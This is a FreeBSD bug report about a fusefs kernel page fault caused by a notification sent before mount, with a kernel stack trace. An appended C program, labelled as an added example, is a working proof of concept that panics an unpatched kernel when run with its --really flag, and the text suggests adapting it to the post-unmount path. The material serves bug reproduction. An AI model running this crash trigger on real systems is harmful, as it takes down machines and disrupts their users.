[Bug 290519] [fusefs]: page fault triggered by asynchronous notification before mount

From: <bugzilla-noreply_at_freebsd.org>
Date: Sat, 25 Oct 2025 23:59:22 UTC
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=290519

            Bug ID: 290519
           Summary: [fusefs]: page fault triggered by asynchronous
                    notification before mount
           Product: Base System
           Version: 16.0-CURRENT
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Only Me
          Priority: ---
         Component: kern
          Assignee: bugs@FreeBSD.org
          Reporter: asomers@FreeBSD.org

If a FUSE daemon for some reason doesn't call nmount promptly after opening
/dev/fuse, and then sends an asynchronous notification message, a page fault
will result.  I haven't observed this behavior from any real file system, but I
can produce it with the test suite.  I also suspect that the same page fault
may be reachable after unmounting the file system, a path that is more likely
to be reachable by a real file system with a real user.

The stack trace looks like this:

#0  __curthread ()
    at /usr/home/somers/src/freebsd.org/src/sys/amd64/include/pcpu_aux.h:57
#1  doadump (textdump=textdump@entry=0)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/kern_shutdown.c:399
#2  0xffffffff804ab9fa in db_dump (dummy=<optimized out>,
    dummy2=<optimized out>, dummy3=<optimized out>, dummy4=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/ddb/db_command.c:596
#3  0xffffffff804ab7ed in db_command (last_cmdp=<optimized out>,
    cmd_table=<optimized out>, dopager=true)
    at /usr/home/somers/src/freebsd.org/src/sys/ddb/db_command.c:508
#4  0xffffffff804ab4ad in db_command_loop ()
    at /usr/home/somers/src/freebsd.org/src/sys/ddb/db_command.c:555
#5  0xffffffff804aeea6 in db_trap (type=<optimized out>, code=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/ddb/db_main.c:267
#6  0xffffffff80bdff2f in kdb_trap (type=type@entry=3, code=code@entry=0,
    tf=tf@entry=0xfffffe00d83dc900)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/subr_kdb.c:790
#7  0xffffffff810e24ee in trap (frame=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/amd64/amd64/trap.c:614
#8  <signal handler called>
#9  kdb_enter (why=<optimized out>, msg=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/subr_kdb.c:556
#10 0xffffffff80b9068b in vpanic (fmt=0xffffffff81267110 "%s",
    ap=ap@entry=0xfffffe00d83dcb30)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/kern_shutdown.c:962
#11 0xffffffff80b904f3 in panic (
    fmt=0xffffffff81d9fad0 <cnputs_mtx> "\026\226\034\201\377\377\377\377")
    at /usr/home/somers/src/freebsd.org/src/sys/kern/kern_shutdown.c:887
#12 0xffffffff810e2fdc in trap_fatal (frame=<optimized out>,
    eva=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/amd64/amd64/trap.c:969
#13 0xffffffff810e2fdc in trap_pfault (frame=0xfffffe00d83dcbd0,
    usermode=false, signo=<optimized out>, ucode=<optimized out>)
#14 <signal handler called>
#15 0xffffffff80c881ff in vfs_ref (mp=mp@entry=0x0)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/vfs_mount.c:530
#16 0xffffffff82a13d4a in fuse_device_write (dev=<optimized out>,
    uio=0xfffffe00d83dcda8, ioflag=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/fs/fuse/fuse_device.c:555
#17 0xffffffff80a0abd3 in devfs_write_f (fp=0xfffff8001d15d230,
    uio=0xfffffe00d83dcda8, cred=<optimized out>, flags=0,
    td=0xfffff8001d144780)
    at /usr/home/somers/src/freebsd.org/src/sys/fs/devfs/devfs_vnops.c:1960
#18 0xffffffff80c0ca61 in fo_write (fp=0xfffff8001d15d230,
    uio=0xfffffe00d83dcda8,
    active_cred=0xffffffff81e5bce8 <w_locklistdata+234328>, flags=0,
    td=0xfffff8001d144780)
    at /usr/home/somers/src/freebsd.org/src/sys/sys/file.h:370
#19 dofilewrite (td=td@entry=0xfffff8001d144780, fd=fd@entry=3,
    fp=0xfffff8001d15d230, auio=auio@entry=0xfffffe00d83dcda8,
    offset=offset@entry=-1, flags=flags@entry=0)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/sys_generic.c:565
#20 0xffffffff80c0c437 in kern_writev (td=0xfffff8001d144780, fd=3,
    auio=0xfffffe00d83dcda8)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/sys_generic.c:492
#21 sys_write (td=0xfffff8001d144780, uap=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/sys_generic.c:407
#22 0xffffffff810e3989 in syscallenter (td=0xfffff8001d144780)
    at /usr/home/somers/src/freebsd.org/src/sys/amd64/amd64/../../kern/subr_syscall.c:193
#23 amd64_syscall (td=0xfffff8001d144780, traced=0)
    at /usr/home/somers/src/freebsd.org/src/sys/amd64/amd64/trap.c:1208
#24 <signal handler called>
#25 0x00002e362005119a in ?? ()

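The trigger described in the report is a write to /dev/fuse, before any mount
exists, of a message whose out-header has unique == 0 (the marker the FUSE
protocol uses for an asynchronous notification) and a notify code in the error
field; the trace shows fuse_device_write then reaching vfs_ref() with mp == NULL.
The program below is an added example, not code from the bug report or from the
FreeBSD tree, that builds such a FUSE_NOTIFY_INVAL_INODE message and optionally
writes it to an opened-but-unmounted /dev/fuse.  The struct layouts and the
notify code 2 mirror the FUSE kernel ABI (fuse_kernel.h); the inode number, the
--really flag and the is_notification() helper are the example's own.  Writing
the message to an unpatched kernel is expected to panic it, so the write is
behind the flag and should only ever be run in a disposable test VM.

```c
/* Added example: constructs the asynchronous FUSE notification that, per the
 * report, reaches vfs_ref(mp=NULL) when sent before nmount(2).  Not from the
 * bug report or the FreeBSD sources. */
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Notify code from fuse_kernel.h (enum fuse_notify_code). */
#define FUSE_NOTIFY_INVAL_INODE 2

/* Wire layouts as in fuse_kernel.h: 16-byte header, 24-byte payload. */
struct fuse_out_header {
    uint32_t len;    /* total message length, header included */
    int32_t  error;  /* for a notification: the notify code */
    uint64_t unique; /* 0 marks a notification rather than a reply */
};

struct fuse_notify_inval_inode_out {
    uint64_t ino;
    int64_t  off;
    int64_t  len;    /* -1 invalidates the whole file */
};

struct inval_inode_msg {
    struct fuse_out_header             hdr;
    struct fuse_notify_inval_inode_out body;
};

/* Returns 1 if a write to /dev/fuse carrying this header is a notification
 * (no outstanding request it answers), 0 if it is a reply. */
int is_notification(const struct fuse_out_header *h)
{
    return h->unique == 0;
}

/* Fill in a FUSE_NOTIFY_INVAL_INODE message for `ino`; returns its length. */
size_t build_inval_inode(struct inval_inode_msg *m, uint64_t ino)
{
    memset(m, 0, sizeof *m);
    m->hdr.len    = (uint32_t)sizeof *m;
    m->hdr.error  = FUSE_NOTIFY_INVAL_INODE;
    m->hdr.unique = 0;          /* asynchronous: not a reply to any request */
    m->body.ino   = ino;
    m->body.off   = 0;
    m->body.len   = -1;
    return sizeof *m;
}

/* Open the device and write the notification WITHOUT mounting first.  This is
 * the sequence the report describes.  Returns write(2)'s result, or -1 with
 * errno set if the device cannot be opened (e.g. on a non-FreeBSD host). */
ssize_t send_unmounted_notification(const char *devpath)
{
    struct inval_inode_msg m;
    size_t n = build_inval_inode(&m, 2 /* arbitrary inode for the example */);
    int fd = open(devpath, O_RDWR);
    if (fd < 0)
        return -1;
    ssize_t r = write(fd, &m, n);
    int saved = errno;
    close(fd);
    errno = saved;
    return r;
}

int main(int argc, char **argv)
{
    struct inval_inode_msg m;
    size_t n = build_inval_inode(&m, 2);

    /* Default: only show what would be written, never touch the device. */
    if (argc < 2 || strcmp(argv[1], "--really") != 0) {
        printf("would write %zu bytes: len=%u error=%d unique=%llu ino=%llu "
               "(notification=%d)\n", n, m.hdr.len, m.hdr.error,
               (unsigned long long)m.hdr.unique,
               (unsigned long long)m.body.ino, is_notification(&m.hdr));
        return 0;
    }
    /* --really: send it to an opened-but-unmounted /dev/fuse (test VM only). */
    ssize_t r = send_unmounted_notification("/dev/fuse");
    if (r < 0)
        perror("write /dev/fuse");
    else
        printf("wrote %zd bytes; kernel survived\n", r);
    return r < 0;
}
```

Without --really the program is harmless and just prints the 40-byte message it
would send; with it, the device is opened and the notification written with no
nmount(2) in between.  The same builder can be reused to probe the post-unmount
path the report mentions, by writing after the file system has been unmounted
rather than before it is mounted.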